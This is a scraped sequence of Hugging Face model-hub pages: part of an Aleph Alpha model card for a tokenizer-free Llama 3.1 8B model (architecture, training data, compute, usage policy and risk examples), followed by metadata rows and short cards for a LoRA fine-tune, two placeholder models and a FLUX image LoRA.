Number of attention heads | 8 | | Head size | 128 | | Number of Key-Value heads | 8 | | Hidden size | 1024 | | Cross-attention hidden size | 4096 | | MLP expansion factor | 2.75 | | MLP type | SwiGLU | | Sequence length | 262144 | | Position embeddings | RoPE with base 1e5 | | Attention type | causal, local with window size 768 | ## Backbone module | | **8B** | | --- | --- | | Number of layers | 32 | | Number of attention heads | 32 | | Head size | 128 | | Number of Key-Value heads | 8 | | Hidden size | 4096 | | MLP expansion factor | 3.5 | | MLP type | SwiGLU | | Sequence length | 32900 | | Position embeddings | RoPE with base 5e5 | | Attention type | causal | ## Decoder module | | **8B** | | --- | --- | | Number of layers | 4 | | Number of attention heads | 8 | | Head size | 128 | | Number of Key-Value heads | 8 | | Hidden size | 1024 | | Cross-attention hidden size | 4096 | | MLP expansion factor | 2.75 | | MLP type | SwiGLU | | Sequence length | 262144 | | Position embeddings | RoPE with base 1e5 | | Attention type | causal, local with window size 768 | **Total parameter count** 8B: `7,192,495,104` **Word splitter** To split arbitrary byte sequences, we adopted the guidelines from [UAX #29](https://unicode.org/reports/tr29/), which splits text into words for common Western languages but also produces meaningful semantic units for other types of languages (e.g. Chinese, Japanese, Korean). From now on, we refer to these splits as words. We also merged leading whitespace and trailing punctuation into the words to reduce sequence length at the word level. To improve the processing of code and math documents, we made additional adjustments to the Unicode splitter. First, we split instances of camel cases like FooBar into Foo and Bar. Second, we treated math symbols (again by Unicode standard) as separate words. ## Pre-Training **Approach** We randomly initialized all model parameters of the encoder, decoder, and connector layers. The backbone architecture precisely matches the Llama architecture, this allowed us to initialize the weights to the pre-trained Llama 3 weights. The model was then trained on the next-byte-prediction objective on a large and diverse document corpus (see below). 
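The word-splitting rules described above can be roughly illustrated in a few lines of Python; the snippet below is a toy sketch using plain regular expressions, not the UAX #29 segmenter actually used, and the production rules may differ in detail.

```python
import re

def split_words(text: str):
    """Toy approximation of the word splitter: leading whitespace and trailing
    punctuation are merged into words, camel case is split, and isolated
    symbols (e.g. math operators) become their own words."""
    # Illustrative camel-case split: "FooBar" -> "Foo", "Bar".
    text = re.sub(r"(?<=[a-z])(?=[A-Z])", " ", text)
    # Optional leading whitespace + word characters + trailing punctuation,
    # or a single non-word symbol (such as a math operator) on its own.
    return re.findall(r"\s*(?:\w+[.,;:!?]*|[^\w\s])", text)

print(split_words("HAT splits FooBar into words, e.g. 3+4."))
# -> ['HAT', ' splits', ' Foo', ' Bar', ' into', ' words,', ...]
```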
Initially, we trained on sequences up to 3500 words for a total amount of 134B words. We then continued training on sequences of up to 32900 words for another 84B words, upweighting longer documents to make use of the extended context. The training was conducted in our [Scaling framework](https://github.com/Aleph-Alpha/scaling). **Data sources** The model was trained on a filtered subset of diverse corpora of text data including proprietary curated datasets, high-quality web content, public domain sources, German texts, mathematical texts, and programming code. The proportions and sources of data we used in the pre-training were: English Language Data (70%) - curated web and synthetic data (63%) - high quality curated sources such as Wikipedia and public domain books (7%) German Language Data (7%) - curated web and synthetic data (6.3%) - high quality curated sources such as Wikipedia and public domain books (0.7%) Mathematical Content (5%) - mathematical code and proofs (2%) - mathematical word problems and equations (3%) Programming Code (18%) - general programming code (11%) - high-quality and synthetic Python code (7%) ## Data curation We applied a range of curation techniques, e.g., for German as described in [Aleph-Alpha-GermanWeb](https://huggingface.co/datasets/Aleph-Alpha/Aleph-Alpha-GermanWeb). These include but are not limited to: - URL filtering. We used a URL filter developed to filter out fraudulent, harmful, and illegal content from an explicit blocklist, e.g., adult websites, or URLs containing words associated with fraudulent, harmful, or adult content. - Text extraction. Natural language texts which were embedded HTML and other web programming languages were extracted using the [Resiliparse](https://github.com/chatnoir-eu/chatnoir-resiliparse) text extractor. - Language identification. We used a [fastText language classifier](https://fasttext.cc/docs/en/language-identification.html) trained on character n-grams from Wikipedia to identify, retain, and sort texts into English and German. - Repetition removal. We applied heuristic methods for detection and removal of repetitions on the line, paragraph, and character level. - Document- and line-level filtering. We utilized additional document-level heuristics to ensure documents had reasonable numbers and quality of words, naturalistic symbols-to-words and numbers-to-words ratios, not predominantly made up of bullet points, and a sufficient quantity of real words. - Deduplication. Using exact and fuzzy deduplication to remove duplicate documents. ## Synthetic data We also generated synthetic data by using permissively-licensed LLMs. ## Instruction Fine-tuning ### Approach We optimized `llama-3_1-8b-tfree-hat-base` for instruction-following using a standard post-training pipeline. First, we applied supervised fine-tuning (SFT) to train the model on both single-turn and multi-turn (chat) instruction-following tasks. Next, we aligned our model for helpfulness and, in parts, safety using Direct Preference Optimization (DPO). ### Data The data used for instruction fine-tuning is based on a mixture of user prompts and model competitions. 
The data mixture consists of roughly 2M samples from diverse datasets including but not limited to: specialized reasoning datasets covering mathematics, programming, and logical inference; human feedback focused on helpful and harmless responses; a small curated set for specific response patterns; safety and robustness subsets for appropriate boundaries; collaborative conversational data; multilingual conversation prompts; tabular data reasoning for structured information; and formal mathematics with advanced problems. We synthesized responses to the prompts using Qwen 2.5-32B and Qwen 2.5-72B. Additionally, we improved German performance by translating English prompts using Mistral-Nemo-Instruct-2407, generating the corresponding answers using Mistral-Small-3.1-Instruct, and performing quality filtering using an LLM judge based on Llama-3.3-70B-Instruct. Lastly, we supplemented the synthetic data with proprietary human-generated SFT data as well as further data sources. For DPO training, we used a similar dataset of prompts and completions from diverse domains. ## Legal Compliance We acknowledge and abide by applicable national and international regulations, including copyright, data privacy, and other related legislation. Any text and data mining by us is performed in compliance with Directive (EU) 2019/790 and its respective national transposition. During the training and fine-tuning of our models, we comply with applicable data privacy laws, including Regulation (EU) 2016/679 (GDPR) and national data privacy regulations. To the extent possible and foreseeable, we also took legislation with forthcoming obligations into account, such as the obligations for General Purpose AI Models under Regulation (EU) 2024/1689 (EU AI Act), and will constantly monitor such developments and adapt our products and this model card accordingly. # Resource Usage ## Compute & Training Efficiency The following table shows the compute resources used in the training stages for the 8B models. | **Model** | **Training phase** | **GPUs** | **Approximate average power consumption per GPU** | **GPU hours** | | --- | --- | --- | --- | --- | | 8B | Continued pre-training | 256 x H100 | 460W | 8000 | | 8B | Long context adaptation | 512 x H200 | 190W | 7100 | | 8B | Long context SFT | 64 x H200 | 350W | 1000 | | 8B | DPO | 128 x H100 | 160W | 2000 | ## Environmental Impact Our H200 and A100 infrastructure runs entirely on 100% renewable energy, ensuring that no CO₂ emissions are directly incurred from training. In addition to this, the H200 data center boasts a power usage effectiveness (PUE) of ≤1.2. Its operation also maintains a net-zero water footprint. Specific number on renewable energy usage for the H100 GPUs is not yet available to us. To estimate the carbon footprint of inference, we base our calculations on publicly available data from the infrastructure provider and, where applicable, standard emissions accounting methodology. We report: - **Carbon emitted**: GPU runtime emissions - **Carbon emitted accounting for PUE**: GPU runtime emissions scaled by the data center's PUE Because the data centers operate fully on renewable energy, both metrics for its operation (excluding infrastructure-related emissions, e.g., initial chip manufacturing) are effectively zero. For H100 GPU infrastructure no information has been made available to us. 
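For illustration of the accounting described above: a runtime-emissions estimate of this kind is typically computed from GPU hours, average power draw, grid carbon intensity, and PUE. The sketch below reuses the continued pre-training row from the compute table (8000 GPU hours at roughly 460 W per GPU) together with a purely hypothetical grid intensity; as stated above, the H200 and A100 operation ran on renewable energy, so the reported values below are zero.

```python
def runtime_emissions_kg(gpu_hours: float, avg_power_w: float,
                         grid_kg_co2_per_kwh: float, pue: float = 1.0) -> float:
    """GPU runtime emissions in kg CO2, optionally scaled by the data center PUE."""
    energy_kwh = gpu_hours * avg_power_w / 1000.0
    return energy_kwh * grid_kg_co2_per_kwh * pue

# Hypothetical grid intensity of 0.4 kg CO2/kWh, chosen only to show the arithmetic.
print(runtime_emissions_kg(8000, 460, 0.4))       # carbon emitted: ~1472 kg CO2
print(runtime_emissions_kg(8000, 460, 0.4, 1.2))  # accounting for PUE 1.2: ~1766 kg CO2
```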
| Metric | H200 GPU | H100 GPU | A100 GPU | | --- | --- | --- | --- | | Carbon emitted | 0 kg CO₂ | no information available | 0 kg CO₂ | | Carbon emitted accounting for PUE | 0 kg CO₂ | no information available | 0 kg CO₂ | ## Power Consumption | GPU Model | Max Power (W) | | --- | --- | | A100 | 400 W | | H100 | 700 W | | H200 | 700 W | Numbers may be contextualized with reference to publicly available studies, such as the carbon footprint of language model training. # Intended Use These models are intended to be deployed as components of AI systems or applications. Use-cases and the model's capabilities include but are not limited to: text generation, classification, summarization, question answering, and labeling. Note that applications might require additional model adaptations or components for guarding against unwanted application behavior or model output. ## Non-Permitted Use Our models shall not be used for illegal or unlawful actions of any kind and with any illegal or unlawful content. This includes in particular prohibited practices according to Article 5 of Regulation (EU) 2024/1689 (EU AI Act) and other activities such as engaging in terrorism, violence, human trafficking, illegal distribution of materials to minors, sexual solicitation, any other criminal activities, harassment, discrimination, creating or promoting malicious code or activities risking death or harm, including those related to military or nuclear applications, and activities not in compliance with sanction regimes, technology export regulations, and other restrictions that may apply. The models are to be used following ethical standards. The utilization of our technology is always governed by, and may be limited in accordance with, our Terms and Conditions, the Open Aleph License, or any specific agreement we might have established with you. Although we do not inspect the requests sent to our API, we regularly review and monitor potential violations that may be related to our models and depending on the circumstances of the specific case take legal action against them. This includes but is not limited to, enforcement to remove published model content, requesting compensation for damages caused, and account termination or removal of credits. For non-anonymous reports, we also provide an appeals mechanism for usage policy violations via our dedicated contact address [[email protected]](mailto:[email protected]) to communicate with us. Customers and partners are enabled to use our [ticketing system](https://servicedesk.aleph-alpha.de/external) for appeals, claims, and feedback. # Risks and Limitations **Note:** Language models are **not agents** and not optimized for prescriptive actions. The use of language models in high-stake environments, for critical decisions or to support a user's wellbeing should be performed with additional guardrails in place. ## Risk Categories In the following sections, we describe risk categories and provide examples of completions we would consider inappropriate or harmful. We then describe steps to minimize these risks. **Harmful Language** | **Prompt** | **Completion** | | --- | --- | | How can I best insult my neighbor? | Insults are a great way to show your neighbor that you don't like them. Here are some ways to insult your neighbor: 1. Call them names. This is a classic way to insult someone. You can call them things like "stupid" or "idiot." 2. Make fun of their appearance. You can say things like "you look ridiculous" or "your hair is a mess." 3. Criticize their choices. 
You can say things like "you always make the wrong decisions" or "you're such a bad judge of character." 4. Make fun of their possessions. You can say things like "your furniture is ugly" or "your car is a junker." 5. Criticize their behavior. You can say things like "you're always so rude" or "you're such a slob." | Large language models can sometimes generate undesired outputs that are unsuitable for certain applications. This includes producing content with harmful language, discriminative content, inappropriate tone and style, systemic biases, or suggestions that might encourage illegal actions. Such outputs can also include incorrect, outdated information, or material that is not suitable for all ages. While we constantly take efforts to reduce the likelihood of such undesired outputs, this possibility can never be fully ruled out. To minimize these issues, the following strategies can be employed: - Abide by the guidance on illegal use provided for in this Model Card. - Crafting prompts carefully to guide the model's output more effectively. - Utilizing a finetuned model (often referred to as a control or instruct model) that prioritizes using explicitly provided information. - Employing a finetuned model designed to maintain an appropriate tone and style, including avoiding offensive language. - Conducting additional validations at the application level to ensure output quality and appropriateness. ### Systemic Biases | **Prompt** | **Completion** | | --- | --- | | What is the name of our new Software engineer? | The name of our new Software engineer is John Doe. | Language models obtain world-knowledge from their pre-training data and may therefore exhibit the same systematic biases that are present in the data. Differing deployment scenarios (including differing cultural contexts) can expose systematic biases in different ways. We acknowledge the cultural diversity of communities and users inside and outside the EU. For larger deployments, we encourage users to track systematic biases relevant to their use-case, and we are happy to consult on bespoke fine-tunings to alleviate such biases. ### Outdated World Knowledge | **Prompt** | **Completion** | | --- | --- | | What was the warmest year in human history? | The warmest year in human history was 2020. It broke several temperature records and was part of a long-term warming trend due to anthropogenic climate change. | Pre-training was performed using a fixed dataset, created at a fixed date in the past. Accordingly, the world knowledge of foundation models is limited to the information contained in its training data. More recent information may not be known to the model or misunderstood when presented as input during live usage. In the above example, the model is convinced that 2020 was the warmest year in human history, however, 2023 ended up breaking that record. This information can not be known by the model due to its knowledge cutoff. Risks include: - Generation of personally identifiable information. Models are not explicitly trained to provide such information, but may seem to provide personally identifiable information. This does not necessarily imply the presence of such information in training data, as hallucination is possible. - Generation of unintended, irrelevant, or repetitive outputs. This includes the production of incorrect or outdated information. Risks may be mitigated by: - Injecting context, where relevant. - Crafting prompts carefully to guide the model's output more effectively. 
- Performing validations on the application layer, e.g., classifying the output. - Using the repetition penalty, especially in the case of repetition, or other parameters available in the API (see [documentation](https://docs.aleph-alpha.com/api/complete/)). - Avoiding of use cases targeted at retrieval of personally identifiable information. ### Political Bias | **Prompt** | **Completion** | | --- | --- | | Should we turn off all the coal power plants? | Coal power plants are the largest source of man-made CO2 emissions. They are also responsible for a large portion of other air pollutants, such as sulfur dioxide, nitrogen oxides, and particulate matter. These pollutants can cause respiratory problems, heart disease, and premature death. In addition to the health impacts, coal power plants also have significant environmental impacts. They contribute to climate change, which is causing sea level rise, more frequent and severe weather events, and loss of biodiversity. Given these impacts, it is clear that we need to transition away from coal power. | Our models have not been optimized to represent a political opinion or take a specific point of view. They may generate outputs that contradict a user's opinion or expectation, e.g., produce hateful, violent or inappropriate, biased, or discriminatory content. Such behavior may be addressed by: - Crafting prompts carefully to guide the model's output more effectively. - Performing validations on the application layer, e.g., via Red-Teaming or classifying the output. ### Mistaken for a Human | **Prompt** | **Completion** | | --- | --- | | Good morning, today is such a beautiful day! | Good morning! It's wonderful to have such a beautiful day ahead of us. | Users may attribute human traits to AI models. This also includes the fact that content generated by the model is not explicitly detectable at this point. It is therefore required to: - Inform end users that they are interacting with or reading output of an AI. - Design the system in a way that mitigates the impact of unintended interpretation of the output. ### Other Errors | **Prompt** | **Completion** | | --- | --- | | The square root of 2929283734 is | The square root of 2929283734 is approximately 481. | Any AI module can produce errors, even after implementing all the recommended measures. When integrating foundation language models into an application, users should: - be aware of the risk of (harmful) failure cases and implement the use case in a way that mitigates such risks. - be aware that foundation models do not contain application logic, e.g., content filters. Enforcement policies relevant to the use case need to be implemented in the application layer. - avoid unsupervised use in high-stakes environments. - validate output with adequate measures. ### Mitigation Approach We specifically tailor model alignment and risk mitigation techniques to each user-facing application built on top of our models, working closely with our customers to refine them according to their unique requirements. Our intention is for these models to undergo further fine-tuning by us and our customers, utilizing their own datasets alongside our support and datasets to ensure suitability for end-user applications, including harm mitigation efforts. Our customers are responsible for adhering to the terms and conditions when aligning the models in their downstream applications. 
### Reproducibility Some inference parameters, e.g., temperature, lead to the random sampling of outputs, which precludes the reproducibility of outputs. Even when such parameters are not in use, outputs may diverge slightly on a numeric level for technical reasons. One may implement the following measures if needed: - Logging of past model outputs on the application layer (Aleph Alpha Research is not storing any data and/or using any data provided in prompts for the training of its LLMs). This list of risks, biases, and limitations may not be complete, as improving the understanding and behavior of language models is an ongoing research topic in the AI science community. # Legal Acknowledgements - **Built with Llama**: Llama 3.1 is licensed under the Llama 3.1 Community License, Copyright © Meta Platforms, Inc. All Rights Reserved. The applicable license agreement can be found under the following link: [Llama 3.1 Community License Agreement](https://www.llama.com/llama3_1/license/) - **Improved using Qwen** \*Aleph Alpha Research refers to Aleph Alpha Research GmbH [hat-paper]: https://arxiv.org/abs/2501.10322
vermoney/1fd0b436-4447-441d-9536-311afa31ac2b
vermoney
2025-05-30T09:49:44Z
0
0
peft
[ "peft", "safetensors", "llama", "axolotl", "generated_from_trainer", "base_model:samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2", "base_model:adapter:samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T09:34:42Z
--- library_name: peft base_model: samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2 tags: - axolotl - generated_from_trainer model-index: - name: 1fd0b436-4447-441d-9536-311afa31ac2b results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2 bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 604e6656275137a8_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_input: input field_instruction: instruct field_output: output format: '{instruction} {input}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 4 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: vermoney/1fd0b436-4447-441d-9536-311afa31ac2b hub_repo: null hub_strategy: end hub_token: null learning_rate: 1.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 64 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 32 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 6 mixed_precision: bf16 mlflow_experiment_name: /tmp/604e6656275137a8_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 46319cf5-cf91-4965-977c-7fcf3d3881a4 wandb_project: s56-7 wandb_run: your_name wandb_runid: 46319cf5-cf91-4965-977c-7fcf3d3881a4 warmup_steps: 50 weight_decay: 0.05 xformers_attention: true ``` </details><br> # 1fd0b436-4447-441d-9536-311afa31ac2b This model is a fine-tuned version of [samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2](https://huggingface.co/samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2) on the None dataset. 
It achieves the following results on the evaluation set: - Loss: 1.1141 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-06 - train_batch_size: 6 - eval_batch_size: 6 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 0.9925 | 0.0002 | 1 | 1.1241 | | 1.1382 | 0.0433 | 250 | 1.1173 | | 1.1629 | 0.0866 | 500 | 1.1141 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
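The card above does not include inference code; the following is a hedged sketch, not verified against this particular checkpoint, of how a LoRA adapter trained this way is typically loaded on top of its base model with PEFT and Transformers.

```python
import torch
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base_id = "samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2"
adapter_id = "vermoney/1fd0b436-4447-441d-9536-311afa31ac2b"

tokenizer = AutoTokenizer.from_pretrained(base_id, trust_remote_code=True)
base = AutoModelForCausalLM.from_pretrained(
    base_id, torch_dtype=torch.bfloat16, device_map="auto", trust_remote_code=True
)
model = PeftModel.from_pretrained(base, adapter_id)

inputs = tokenizer("Hello, how are you?", return_tensors="pt").to(base.device)
print(tokenizer.decode(model.generate(**inputs, max_new_tokens=32)[0], skip_special_tokens=True))
```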
ajia2/qwen_sft_trained_v4
ajia2
2025-05-30T09:49:38Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:49:12Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Manucn10/kaggle-v5
Manucn10
2025-05-30T09:49:07Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:48:59Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68
Varinder2110
2025-05-30T09:45:16Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-05-30T08:39:41Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: TOK --- # 38837B9F 6D2D 4F57 B2A5 E37F1A56Ac68 <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `TOK` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "TOK", "lora_weights": "https://huggingface.co/Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68', weight_name='lora.safetensors') image = pipeline('TOK').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 6000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/Varinder2110/38837b9f-6d2d-4f57-b2a5-e37f1a56ac68/discussions) to add images that show off what you’ve made with this LoRA.
connector/pig-1k
connector
2025-05-30T09:43:24Z
0
1
null
[ "pig", "text-to-image", "en", "license:mit", "region:us" ]
text-to-image
2025-01-31T09:40:44Z
